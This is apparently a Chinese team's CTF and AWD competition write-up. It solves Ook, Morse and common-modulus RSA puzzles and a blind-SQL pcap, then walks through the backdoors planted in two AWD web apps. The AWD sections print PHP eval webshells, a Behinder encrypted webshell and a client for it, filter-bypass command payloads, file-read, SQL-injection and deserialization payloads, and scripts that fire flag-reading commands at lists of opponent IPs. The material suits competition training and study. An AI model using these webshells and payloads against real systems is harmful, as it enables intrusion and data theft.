Contents

  • CTF
    • Misc
      • Boring_exe
      • !_
      • ezAffine
      • Daylight
      • Blue
    • Web
      • Aurora website
      • web2 (forgot the name)
    • Crypto
      • EasyRSA
      • Interceptedtelegram
  • AWD
    • AWD1
    • AWD2

CTF

Misc

Boring_exe

!_

..... ..... ..... ..... !?!!. ?.... ..... ..... ..... .?.?! .?... .!...
..... ..... !.?.. ..... !?!!. ?!!!! !!?.? !.?!! !!!.. ..... ..... .!.?.
..... ...!? !!.?. ..... ..?.? !.?.. ..... .!.?. ..... ..... ..!?! !.?!!
!!!!! !!!!! ?.?!. ?!!!! !!!!! !!!!! !!!.? ..... ..... .!?!! .?... .....
..?.? !.?.. ..... ..... ..!.! !!!!! !!!.! !!!!. ?.... ...!? !!.?. .....
?.?!. ?..!. !!!!! !!!!. !!!!! !!!!. ?.... ..... !?!!. ?.... ....? .?!.?
....! .?.

Ook! cipher
Ook! online decoder (the bugku Brainfuck tool also handles Ook!): https://tool.bugku.com/brainfuck/

flag{Ookisok}

ezAffine

Daylight

Thanks to the WAXZ team (Jiangxi Normal University) for providing the writeup for this challenge.

n=24030381175065789627867818021031309186965318861955402618375094156989560631225056400068280970357343617465261811691559275086986164901405512215968447835573713149231336594364799146504286982124850979481910739400555900516891562640944424296188089156508429086638459243074623801424444379741940400624550247210709108293164193827193821978694274672716764474152393429524314859853376325015012885883855819552203740904895242301492787682366135817255276597250505586595070110209229270379691148517421288247672403709484984083988966720494416926899250840012575481136166618973367329708626081023089829778864549053830890201012932527796486827519
c1=7706442311376298907118381553814187694306437942337200300920018382827744477296762105669322390236380377042026460058526286493515418722731849971411879053724334926597860433790660568227623266459105700578574867980278136078799958698624620338469216407947276632981229373095281141319203245321172350378427449842394930055529441744690732690189155630980736716300509547085032174345753133838250340838995285142338255951756404101946977370148727459867175980397841996210997274012491629791252693401571504945522427861126234928419824136852180508014703063857673244567242488630499415730763245048617632714296374909199028722650732705222178007385
c2=22423938730620301024336096061283705945892027623793660306239291359418958473934583979350384252488494023600239884048653436314101275290157972045454993641659471672605679497398173588217340705125922148550132426481727445141158741816240665812195493040369287582638492321538655028939958996384211181094086886177394010485535445009088322043647955338445795429449360349339936606800994026319620067195422963814641797851423046506617965736694331256799051468484280532276344029152140431817760731420316457245257243157665090587855008596785240088881665435451552191237548113820151383474872494353994135644477990413743416249730006854238049329690
e1=35
e2=42
# Python 3 (the original was written for Python 2: print statements, integer division with /)
import gmpy2
from Crypto.Util import number


def exgcd(m, n):
    """Extended Euclid: returns (g, x, y) with m*x + n*y = g = gcd(m, n)."""
    if n == 0:
        return m, 1, 0
    a1 = b = 1
    a = b1 = 0
    c, d = m, n
    q, r = c // d, c % d
    while r:
        c, d = d, r
        t = a1
        a1 = a
        a = t - q * a
        t = b1
        b1 = b
        b = t - q * b
        q, r = c // d, c % d
    return d, a, b


c1 = 7706442311376298907118381553814187694306437942337200300920018382827744477296762105669322390236380377042026460058526286493515418722731849971411879053724334926597860433790660568227623266459105700578574867980278136078799958698624620338469216407947276632981229373095281141319203245321172350378427449842394930055529441744690732690189155630980736716300509547085032174345753133838250340838995285142338255951756404101946977370148727459867175980397841996210997274012491629791252693401571504945522427861126234928419824136852180508014703063857673244567242488630499415730763245048617632714296374909199028722650732705222178007385
c2 = 22423938730620301024336096061283705945892027623793660306239291359418958473934583979350384252488494023600239884048653436314101275290157972045454993641659471672605679497398173588217340705125922148550132426481727445141158741816240665812195493040369287582638492321538655028939958996384211181094086886177394010485535445009088322043647955338445795429449360349339936606800994026319620067195422963814641797851423046506617965736694331256799051468484280532276344029152140431817760731420316457245257243157665090587855008596785240088881665435451552191237548113820151383474872494353994135644477990413743416249730006854238049329690
e1 = 35
e2 = 42
n = 24030381175065789627867818021031309186965318861955402618375094156989560631225056400068280970357343617465261811691559275086986164901405512215968447835573713149231336594364799146504286982124850979481910739400555900516891562640944424296188089156508429086638459243074623801424444379741940400624550247210709108293164193827193821978694274672716764474152393429524314859853376325015012885883855819552203740904895242301492787682366135817255276597250505586595070110209229270379691148517421288247672403709484984083988966720494416926899250840012575481136166618973367329708626081023089829778864549053830890201012932527796486827519

# gcd(e1, e2) = 7, so the common-modulus combination below yields m^7, not m
e1 = e1 // 7
e2 = e2 // 7
ans = exgcd(e1, e2)
s1 = ans[1]   # 5*s1 + 6*s2 = 1; one coefficient is negative, powmod then uses the modular inverse
s2 = ans[2]
m = (gmpy2.powmod(c1, s1, n) * gmpy2.powmod(c2, s2, n)) % n   # == m^7 mod n
print(gmpy2.iroot(m, 7)[1])
# if m^7 wrapped past n, add n back until the 7th root is exact
while not gmpy2.iroot(m, 7)[1]:
    m = m + n
print(m)
print(number.long_to_bytes(gmpy2.iroot(m, 7)[0]))
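For reference, the same attack as a self-contained pure-Python routine. This is an added example, not part of the original writeup or the WAXZ team's solution: it constructs its own key (two Mersenne primes for n, the challenge's exponents 35 and 42) and a plaintext small enough that m^7 < n, which is the condition that makes the integer root exact. The add-n loop from the script above is kept, but capped, since it can only help when m^7 barely exceeds n.

```python
from math import gcd


def ext_gcd(a, b):
    """Extended Euclid: returns (g, x, y) with a*x + b*y = g = gcd(a, b)."""
    x0, x1, y0, y1 = 1, 0, 0, 1
    while b:
        q, a, b = a // b, b, a % b
        x0, x1 = x1, x0 - q * x1
        y0, y1 = y1, y0 - q * y1
    return a, x0, y0


def iroot(x, k):
    """Integer k-th root by binary search: returns (r, exact) with r = floor(x ** (1/k))."""
    lo, hi = 0, 1 << ((x.bit_length() + k - 1) // k + 1)
    while lo < hi:
        mid = (lo + hi + 1) // 2
        if mid ** k <= x:
            lo = mid
        else:
            hi = mid - 1
    return lo, lo ** k == x


def common_modulus(n, c1, e1, c2, e2):
    """Return ((m ** g) mod n, g) with g = gcd(e1, e2), from two ciphertexts under one modulus."""
    g = gcd(e1, e2)
    _, s1, s2 = ext_gcd(e1 // g, e2 // g)      # s1*(e1/g) + s2*(e2/g) = 1

    # One of s1, s2 is negative: raise the modular inverse of c to the positive power instead.
    def powmod(c, s):
        return pow(c, s, n) if s >= 0 else pow(pow(c, -1, n), -s, n)

    return powmod(c1, s1) * powmod(c2, s2) % n, g


def recover(n, c1, e1, c2, e2, max_wraps=1000):
    """Recover m as bytes. If m**g overflowed n, add n back a bounded number of times
    (the writeup's while-loop, with a cap so a hopeless case cannot spin forever)."""
    mg, g = common_modulus(n, c1, e1, c2, e2)
    for _ in range(max_wraps):
        root, exact = iroot(mg, g)
        if exact:
            return root.to_bytes((root.bit_length() + 7) // 8, "big")
        mg += n
    return None


def demo():
    # Constructed demo key: two Mersenne primes, so n is 196 bits and m**7 stays below n.
    p, q = (1 << 89) - 1, (1 << 107) - 1
    n = p * q
    e1, e2 = 35, 42                     # same exponents as the challenge, gcd = 7
    m = int.from_bytes(b"ok!", "big")   # constructed plaintext (24 bits, so m**7 < 2**168 < n)
    c1, c2 = pow(m, e1, n), pow(m, e2, n)
    return recover(n, c1, e1, c2, e2)


if __name__ == "__main__":
    print(demo())
```

With the challenge's real n, c1, c2 the same `recover()` call applies unchanged; `pow(c, -1, n)` needs Python 3.8 or newer.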

flag{1_0nly_see_d4ylight_d4ylight}

Blue

binwalk analysis


foremost extraction


ZIP pseudo-encryption

This yields blindsql.pcapng

The file name already says this is a blind SQL injection capture, so filtering for HTTP packets is enough.
Parameters are passed directly via GET, so the filter can be narrowed further:

http.request.method==GET


Analysing the blind injection, you can see that the ASCII code of the first character of the flag field is 102:

>>> chr(102)
'f'

Continue in the same way for the remaining positions.
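Rather than reading each character off the capture by hand, the search can be replayed from the request/response pairs. This is an added example, not part of the original writeup: it assumes a sqlmap-style probe of the form ascii(substr((select flag from flag),N,1))>V or =V (adjust PROBE to the exact expression seen in the capture), that the true and false pages differ in size, and it runs on a constructed capture rather than the real blindsql.pcapng. Export each request URI together with its response length from Wireshark into the same pair list to use it on the real file.

```python
import re
from urllib.parse import unquote

# Probe shape is assumed (sqlmap-style); column and table names come from the constructed sample.
PROBE = re.compile(
    r"ascii\(substr\(\(select\s+flag\s+from\s+flag\),\s*(\d+),\s*1\)\)\s*(>|=)\s*(\d+)", re.I)


def reconstruct(requests, true_len):
    """requests: iterable of (request_uri, response_length) pairs in capture order.
    A response of `true_len` bytes is taken as the 'condition true' page.
    Each position is narrowed by `>` probes (binary search) or pinned by an `=` probe;
    positions that never converge are emitted as '?'."""
    bounds = {}                                  # position -> [lo, hi], inclusive
    for uri, length in requests:
        m = PROBE.search(unquote(uri))
        if not m:
            continue                             # not a probe (baseline request, static assets, ...)
        pos, op, val = int(m.group(1)), m.group(2), int(m.group(3))
        lo, hi = bounds.setdefault(pos, [0, 255])
        truth = length == true_len
        if op == "=" and truth:
            lo = hi = val
        elif op == ">":
            if truth:
                lo = max(lo, val + 1)
            else:
                hi = min(hi, val)
        bounds[pos] = [lo, hi]
    return "".join(chr(lo) if lo == hi else "?" for lo, hi in (bounds[p] for p in sorted(bounds)))


def probe_uri(pos, op, val):
    """Build a request line the way it appears in http.request.uri (constructed format)."""
    return "/index.php?id=1%%20and%%20ascii(substr((select%%20flag%%20from%%20flag),%d,1))%s%d" % (pos, op, val)


# Constructed capture: a binary search over each of the first four characters, with a
# 1532-byte page for 'true' and a 1440-byte page for 'false'.
TRUE_LEN, FALSE_LEN = 1532, 1440
_STEPS = [
    (1, 64, True), (1, 96, True), (1, 112, False), (1, 104, False), (1, 100, True), (1, 102, False), (1, 101, True),
    (2, 64, True), (2, 96, True), (2, 112, False), (2, 104, True), (2, 108, False), (2, 106, True), (2, 107, True),
    (3, 64, True), (3, 96, True), (3, 112, False), (3, 104, False), (3, 100, False), (3, 98, False), (3, 97, False),
    (4, 64, True), (4, 96, True), (4, 112, False), (4, 104, False), (4, 100, True), (4, 102, True), (4, 103, False),
]
SAMPLE = [("/index.php?id=1", TRUE_LEN)] + [
    (probe_uri(pos, ">", val), TRUE_LEN if truth else FALSE_LEN) for pos, val, truth in _STEPS]

if __name__ == "__main__":
    print(reconstruct(SAMPLE, TRUE_LEN))
```

Keying "true" on the response size is the usual shortcut; if the two pages are the same size, key on a marker string in the body instead.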

flag{Gre4t_j0B_ON_This_Blue_sh4rk}

Web

Aurora website

Upload an image and change the Content-Type; from the hint, this is a race condition.
Keep firing the upload with Burp Intruder (and request the uploaded file in parallel) and it works.

web2 (forgot the name)

Thanks to the Stalker team (Jiangxi University of Science and Technology) for the approach.

Crypto

EasyRSA

flag{We1c0meCtf3r_elab}

Interceptedtelegram


Morse code

.- -.-. - .. ----- -. --.- ..- .. -.-. -.-

Morse code online decoder: http://www.zhongguosou.com/zonghe/moersicodeconverter.aspx

flag{ACTI0NQUICK}

AWD

AWD1

awd1
├── about.php
├── admin
│   ├── footer.php
│   ├── header.php
│   ├── index.php
│   ├── logout.php
│   ├── upload
│   │   ├── 1596596144.png
│   │   ├── 1600179756.php
│   │   ├── 1600180813.exe
│   │   └── .library.php
│   └── upload.php
├── config.php
├── contact.php
├── css
│   ├── bootstrap.css
│   ├── chocolat.css
│   ├── flexslider.css
│   └── style.css
├── data
│   ├── flot-data.js
│   └── morris-data.js
├── footer.php
├── gulpfile.js
├── header.php
├── images
│   ├── 10.jpg
│   ├── 11.jpg
│   ├── 12.jpg
│   ├── 13.jpg
│   ├── 14.jpg
│   ├── 15.jpg
│   ├── 16.jpg
│   ├── 17.jpg
│   ├── 1.jpg
│   ├── 1.png
│   ├── 2.jpg
│   ├── 2.png
│   ├── 3.jpg
│   ├── 3.png
│   ├── 4.jpg
│   ├── 4.png
│   ├── 5.jpg
│   ├── 5.png
│   ├── 6.jpg
│   ├── 7.jpg
│   ├── 8.jpg
│   ├── 9.jpg
│   ├── banner1.jpg
│   ├── banner.jpg
│   ├── close.png
│   ├── co.png
│   ├── img-sp.png
│   ├── left.png
│   └── right.png
├── index.php
├── js
│   ├── bootstrap.js
│   ├── jquery-1.11.1.min.js
│   ├── jquery.chocolat.js
│   ├── jquery.flexslider.js
│   └── sb-admin-2.js
├── less
│   ├── mixins.less
│   ├── sb-admin-2.less
│   └── variables.less
├── login.php
├── search.php
├── ser.php
├── services.php
├── .shell.php
├── single.php
└── Wopop_files
    ├── askgreen.png
    ├── errorred.png
    ├── google_jquery.min.js
    ├── google_jquery-ui.min.js
    ├── JQuery.cookie.js
    ├── jquery.pagination.js
    ├── jquery.ui.all.css
    ├── loading1.gif
    ├── loadingpn.gif
    ├── login_bgx.gif
    ├── login.js
    ├── login_m_bg.png
    ├── logo.png
    ├── okgreen.png
    ├── pagination.css
    ├── site_bg.png
    ├── style.css
    ├── style_log.css
    ├── userpanel.css
    └── webtemples.js

8 directories, 85 files

Exploit point 1

Backdoor file: awd1/.shell.php

<?php
$key = $_POST["cmd"];
if(isset($key)){
    $key = str_replace("flag","",$key);
}
eval($key);
?>

It only replaces the literal string flag with an empty string, and str_replace runs once rather than recursively, so there are many ways around it:

cmd=system("cat /flflagag.txt");
cmd=system("cat /fl''ag.txt");
cmd=system("cat /fla'g'.txt");
cmd=system("cat /fl${9}ag.txt");
cmd=system("cat /fl${IFS}ag.txt");
cmd=system("cat /fl\ag.txt");
cmd=system("cat /`echo 'ZmxhZy50eHQ=' | base64 -d`");
........

import requests


def post_shell(ip_list):
    flag_path = '/.shell.php'  # shell path
    post_data = 'cmd=system("cat /flflagag.txt");'
    for i in ip_list:
        header_info = {
            'Host': i,
            'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0',
            'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
            'Accept-Language': 'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2',
            'Accept-Encoding': 'gzip, deflate',
            'Content-Type': 'application/x-www-form-urlencoded'
        }
        flag_url = 'http://' + i + flag_path
        res = requests.post(url=flag_url, data=post_data, headers=header_info)
        print("[+]{0}:   {1}\n".format(i, res.text))


if __name__ == '__main__':
    ip_list = ['172.20.102.101', '172.20.103.101', '172.20.104.101', '172.20.105.101',
               '172.20.106.101', '172.20.107.101', '172.20.108.101', '172.20.109.101',
               '172.20.110.101', '172.20.111.101', '172.20.112.101']
    post_shell(ip_list)

Exploit point 2

Arbitrary file read: awd1/about.php

<?php
$file=$_GET['file'];
$file = str_replace("flag","",$file);
$file = str_replace("../","",$file);
$file = str_replace("..","",$file);
$file = str_replace("file://","",$file);
@print_r(file_get_contents($file));
?>

Each str_replace runs only once, so doubling a filtered token (flflagag, fifile://le://) leaves the real token behind after the replacement. Read the flag through the file:// wrapper or a bare absolute path (file_get_contents accepts either); in the AWD environment the absolute path of the flag is known: /flag.txt

?file=fifile://le:///flflagag.txt
?file=php://filter/read=convert.base64-encode/resource=/flflagag.txt
......

Exploit point 3

Code execution: awd1/config.php

// root directory
$basedir = '';
$shell=@$_POST['shell'];
if(preg_match('/(system|exec|shell|file_|call|open|preg|eval|assert|pass|include|require|key)/i', $shell)) {
    exit();
}
@eval($shell);

The blacklist is matched against the raw source text, so build the function name at runtime instead of writing it literally. The (s.y.s.t.e.m) form relies on undefined constants evaluating to their own names, which PHP 7 allows with a warning and PHP 8 rejects with an Error; the hex-escape string form works on every version:

shell=(s.y.s.t.e.m)('cat /flag.txt');
shell="\x73\x79\x73\x74\x65\x6d"('cat /flag.txt');

Exploit point 4

Arbitrary file read: awd1/contact.php

<?php
include 'header.php';
$file_path = @$_GET['path'];
if(file_exists($file_path)){
    $fp = fopen($file_path,"r");
    $str = fread($fp,filesize($file_path));
    echo $str = str_replace("\r\n","<br />",$str);
}
?>
?path=/flag.txt
?path=/etc/passwd

Exploit point 5

Command execution with filter bypass: awd1/footer.php

<?php
$shell=@$_POST['shell'];
if(preg_match('/(cat|\ |more|flag)/i',$shell)&&str_replace(" ","",$shell)) {
    exit();
}else{
    @system($shell);
}
?>
shell=ca''t</fl''ag.txt
shell=`echo${IFS}Y2F0IC9mbGFnLnR4dAo=|base64${IFS}-d`
shell=a=ca;b=t;c=fl;d=ag;$a$b${IFS}/$c$d.txt

Exploit point 6

SQL injection: awd1/login.php

<?php
include_once('config.php');
if (!empty($_POST['username'])) {
    $user=$_POST['username'];
    $pass=$_POST['password'];
    $query = "SELECT * FROM admin WHERE user_name='{$user}' and user_pass='{$pass}' ";
    $data = mysqli_query($dbc,$query);
    if (mysqli_num_rows($data) == 1) {
        $row = mysqli_fetch_array($data);
        $_SESSION['username'] = $row['user_name'];
        header('Location: ./admin/index.php');
    }else{
        echo '<hr/><center><br/>Username:',$user,'<br/>Password:',$pass,'<br/><br/>Wrong username or password</center>';
    }
}
?>
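What the `== 1` check does to the injection, as an added example (not part of the writeup): the same string splice as login.php run against a constructed SQLite table, with a parameterised version beside it. `' OR 1=1` alone returns every row and fails the one-row check, so either a `LIMIT 1` or a known username is needed. The comment syntax differs slightly from the MySQL the challenge uses: SQLite only knows `-- `, MySQL also accepts `#`.

```python
import sqlite3


def build_query(user, password):
    """The exact string login.php builds: user input spliced into SQL."""
    return f"SELECT * FROM admin WHERE user_name='{user}' and user_pass='{password}' "


def make_db():
    """Constructed stand-in for the admin table (SQLite instead of MySQL)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE admin (user_name TEXT, user_pass TEXT)")
    db.executemany("INSERT INTO admin VALUES (?, ?)",
                   [("admin", "s3cret"), ("editor", "hunter2")])
    return db


def login_vulnerable(db, user, password):
    """Mirrors login.php: success iff the spliced query returns exactly one row."""
    rows = db.execute(build_query(user, password)).fetchall()
    return len(rows) == 1


def login_fixed(db, user, password):
    """The same check with a parameterised query: input can no longer change the SQL."""
    rows = db.execute("SELECT * FROM admin WHERE user_name=? AND user_pass=?",
                      (user, password)).fetchall()
    return len(rows) == 1


if __name__ == "__main__":
    db = make_db()
    for user in ("admin' -- ", "' OR 1=1 LIMIT 1 -- ", "' OR 1=1 -- ", "admin"):
        print(repr(user), login_vulnerable(db, user, "wrong"), login_fixed(db, user, "wrong"))
```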




Exploit point 7

SQL injection: awd1/search.php

<?php
include 'header.php';
include_once('config.php');
$id=$_GET['id'];
$check = eregi('select|insert|update|delete|\'|\/\*|\*|\.\.\/|\.\/|union|into|load_file|outfile', $id);
if($check){
    echo "Invalid strings!!!Please try agine!";
}else{
    $query = "SELECT * FROM news WHERE id=$id";
    $data = mysqli_query($dbc,$query);
    $com = mysqli_fetch_array($data);
}
?>

eregi() is not binary-safe: a %00 in the parameter ends the string it inspects, so anything after the null byte passes the blacklist and still reaches the query.

ereg() and eregi() were deprecated in PHP 5.3 and removed in PHP 7; my container environment here is PHP 7.3, and testing it returns a fatal error.


Too lazy to test this one...

Exploit point 8

Deserialization to code execution: awd1/ser.php

<?php
class Smi1e
{
    protected $ClassObj;
    function __construct() {
        $this->ClassObj = new safe();
    }
    function __destruct() {
        $this->ClassObj->action();
    }
}
class safe
{
    function action() {
        echo "Here is safe";
    }
}
class unsafe
{
    private $data;
    function action() {
        eval($this->data);
    }
}
unserialize(@$_GET['test']);

Build the POC directly: swap the safe object for an unsafe one whose private $data holds the PHP to execute. __destruct() runs when the unserialized Smi1e object is freed and calls $ClassObj->action(), which in the unsafe class is eval():

<?php
class Smi1e
{
    protected $ClassObj;
    function __construct() {
        $this->ClassObj = new unsafe();
    }
    function __destruct() {
        $this->ClassObj->action();
    }
}
class unsafe
{
    private $data="system('cat /flag.txt');";
    function action() {
        eval($this->data);
    }
}
$res = new Smi1e();
echo urlencode(serialize($res));
?>
?test=O%3A5%3A%22Smi1e%22%3A1%3A%7Bs%3A11%3A%22%00%2A%00ClassObj%22%3BO%3A6%3A%22unsafe%22%3A1%3A%7Bs%3A12%3A%22%00unsafe%00data%22%3Bs%3A24%3A%22system%28%27cat+%2Fflag.txt%27%29%3B%22%3B%7D%7D


PS: a gripe about the class name Smi1e chosen by the challenge author; I kept reading Smi1e as Smile.......

Exploit point 9

Command execution: awd1/admin/footer.php

<?php
$shell=@$_POST['shell'];
@system($shell);
if($shell !=""){
    exit();
}
?>
shell=cat /flag.txt

Exploit point 10

Flag handed out directly: awd1/admin/index.php

<!-- banner -->
<div class="banner1"></div>
<!-- //banner -->
<!-- single -->
<div class="single">
<div class="container">
<div class="single-page-artical">
<div class="artical-content">
<h3>flag:<?php print_r(file_get_contents('/flag'));?></h3>
<img class="img-responsive" src="../images/banner.jpg" alt=" " />
<p></p>
</div>

But as I remember it, during the competition the flag path and file name were /flag.txt, so this could not read it at the time.

Change the path to /flag.txt and the flag is readable.

Exploit point 11

Arbitrary file upload: awd1/admin/upload.php

<html lang="zh-CN"><head><meta charset="utf-8">
<?php
include_once('../config.php');
if (isset($_SESSION['username'])) {
    include_once('header.php');
    $html_username = htmlspecialchars($_SESSION['username']);
    if(isset($_SESSION['error_info']) && $_SESSION['error_info'] != '') {
        echo $_SESSION['error_info'];
        $_SESSION['error_info'] = '';
    }
}
else {
    header('Location: ../login.php');
}
$error=$_FILES['pic']['error'];
$tmpName=$_FILES['pic']['tmp_name'];
$name=$_FILES['pic']['name'];
$size=$_FILES['pic']['size'];
$type=$_FILES['pic']['type'];
try{
    if($name!==""){
        $name1=substr($name,-4);
        if(is_uploaded_file($tmpName)){
            $time=time();
            $rootpath='./upload/'.$time.$name1;
            $file=fopen($tmpName, "r") or die('No such file!');
            $content=fread($file, filesize($tmpName));
            if(strstr($content,'fuck')){
                exit("<script language='JavaScript'>alert('You should not do this!');window.location='index.php?page=submit'</script>");
            }
            if(!move_uploaded_file($tmpName,$rootpath)){
                echo "<script language='JavaScript'>alert('File move failed!');window.location='index.php?page=submit'</script>";
                exit;
            }
        }
        echo "Upload succeeded: /upload/".$time.$name1;
    }
}
catch(Exception $e)
{
    echo "ERROR";
}
//
require('footer.php');?></html>




The saved name is time() plus the last four characters of the original file name, so an upload called x.php keeps its .php extension, and the only content check is for the substring 'fuck'. Note also that the unauthenticated branch only sends a Location header without exit(), so the upload code still runs without a session. The challenge itself also ships a ready-made command-execution backdoor at awd1/admin/upload/1600179756.php:

//1600179756.php
<?php system($_GET['cmd']);?>

Exploit point 12

Behinder (冰蝎) webshell: awd1/admin/upload/.library.php

<?php
@error_reporting(0);
session_start();
if (isset($_GET['djicoieDJNCIVD']))
{
    $key=substr(md5(uniqid(rand())),16);
    $_SESSION['k']=$key;
    print $key;
}
else
{
    $key=$_SESSION['k'];
    $post=file_get_contents("php://input");
    if(!extension_loaded('openssl'))
    {
        $t="base64_"."decode";
        $post=$t($post."");
        for($i=0;$i<strlen($post);$i++) {
            $post[$i] = $post[$i]^$key[$i+1&15];
        }
    }
    else
    {
        $post=openssl_decrypt($post, "AES128", $key);
    }
    $arr=explode('|',$post);
    $func=$arr[0];
    $params=$arr[1];
    class C{public function __construct($p) {eval($p."");}}
    @new C($params);
}
?>

Background on the Behinder webshell: https://www.t00ls.net/articles-56337.html

The openssl_encrypt call below encrypts the "|system(...)" body with an empty passphrase, which PHP pads to 16 NUL bytes; against the live shell the passphrase is the 16 hex characters printed by the ?djicoieDJNCIVD request, which must be sent first with the same PHPSESSID cookie.

PS C:\Users\Administrator\Desktop> php -r "echo openssl_encrypt('|system(\'whoami\');','AES128','');"
sbD9xXGKpb2/BSn/O/gPNg0MrbwusxVXLEVTNRXyGcc=
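A client for the two branches of this shell, as an added example (not Behinder's own client or the writeup's): the key request, the XOR branch mirrored byte for byte from the PHP above, and the AES branch's parameters (AES-128-CBC, PKCS#7, all-zero IV because the shell passes none) via pycryptodome, which is optional and not exercised by the self-test. The live-target HTTP exchange is described in the comments and assumes the PHPSESSID cookie is kept between the key request and the POST.

```python
import base64
import hashlib
import os

KEY_PARAM = "djicoieDJNCIVD"   # GET parameter that makes .library.php mint a session key


def server_make_key():
    """Constructed stand-in for substr(md5(uniqid(rand())), 16): the last 16 hex digits of an MD5."""
    return hashlib.md5(os.urandom(16)).hexdigest()[16:]


def xor_encrypt(key, php_code):
    """Client side of the no-openssl branch: byte i is XORed with key[(i+1) & 15], then base64."""
    k = key.encode()
    data = php_code.encode()
    return base64.b64encode(bytes(b ^ k[(i + 1) & 15] for i, b in enumerate(data))).decode()


def server_decode(key, body):
    """What .library.php does to the POST body when openssl is missing (mirrors the PHP loop)."""
    k = key.encode()
    raw = base64.b64decode(body)
    post = bytes(b ^ k[(i + 1) & 15] for i, b in enumerate(raw)).decode()
    func, params = post.split("|", 1)         # explode('|', $post): $func, $params
    return func, params                       # $params is what reaches eval()


def build_payload(php_code):
    """The shell evals explode('|')[1], so the body is '|<code>' and the code must not contain '|'."""
    if "|" in php_code:
        raise ValueError("payload cannot contain '|': explode('|') would split it")
    return "|" + php_code


def aes_encrypt(key, php_code):
    """Client side of the openssl branch: openssl_encrypt($p, 'AES128', $key) is AES-128-CBC with
    PKCS#7 padding and, since no IV is passed, an all-zero IV (PHP warns and fills it with NULs).
    Needs pycryptodome; not used by the self-test."""
    from Crypto.Cipher import AES          # pycryptodome
    from Crypto.Util.Padding import pad
    k = key.encode().ljust(16, b"\0")[:16]   # PHP pads a short passphrase with NULs, truncates a long one
    ct = AES.new(k, AES.MODE_CBC, iv=b"\0" * 16).encrypt(pad(php_code.encode(), 16))
    return base64.b64encode(ct).decode()


def roundtrip(php_code="system('whoami');"):
    """Key from the server, encrypted payload from the client, decoded as the shell would."""
    key = server_make_key()
    body = xor_encrypt(key, build_payload(php_code))
    return server_decode(key, body)


if __name__ == "__main__":
    # Against a live target (assumed URL): GET .library.php?djicoieDJNCIVD=1, keeping the
    # PHPSESSID cookie, to read the key; then POST the encrypted body to the same URL with the
    # same cookie. With openssl loaded use aes_encrypt(), otherwise xor_encrypt().
    print(roundtrip())
```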

AWD2

Exploit point 1

File read that hands out the flag directly: ecshop/a.php

<?php
if(isset($_GET['shop'])){echo file_get_contents(base64_decode('L2ZsYWcudHh0'));}
?>
PS C:\Users\Administrator> php -r "var_dump(base64_decode('L2ZsYWcudHh0'));"
string(9) "/flag.txt"

import requests


def get_shell(ip_list):
    flag_path = '/a.php'
    pwd = 'shop'
    command = 'test'
    for i in ip_list:
        flag_url = 'http://' + i + flag_path + '?' + pwd + '=' + command
        res = requests.get(url=flag_url)
        print("[+]{0}:   {1}\n".format(i, res.text))


if __name__ == '__main__':
    ip_list = ['172.20.102.102', '172.20.103.102', '172.20.104.102', '172.20.105.102',
               '172.20.106.102', '172.20.107.102', '172.20.108.102', '172.20.109.102',
               '172.20.110.102', '172.20.111.102', '172.20.112.102']
    get_shell(ip_list)

Exploit point 2

Command execution: ecshop/api.php

$hook = $_GET['s'];
if(isset($hook)){
    echo `$hook`;
}
?s=cat /flag.txt

Exploit point 3

File read that hands out the flag directly: ecshop/check_file.php

if(isset($_GET['shop'])){echo file_get_contents(base64_decode('L2ZsYWcudHh0'));}

Exploit point 4

File read that hands out the flag: ecshop/config.php

<?php
if(isset($_GET['shop'])){echo file_get_contents(base64_decode('ZmxhZy50eHQ='));}
?><?php
if(isset($_GET['shop'])){echo file_get_contents(base64_decode('ZmxhZy50eHQ='));}
?>

The path here is relative (the base64 decodes to flag.txt, not /flag.txt), so it resolves against the script's working directory and the flag cannot be read:

PS C:\Users\Administrator> php -r "var_dump(base64_decode('ZmxhZy50eHQ='));"
string(8) "flag.txt"
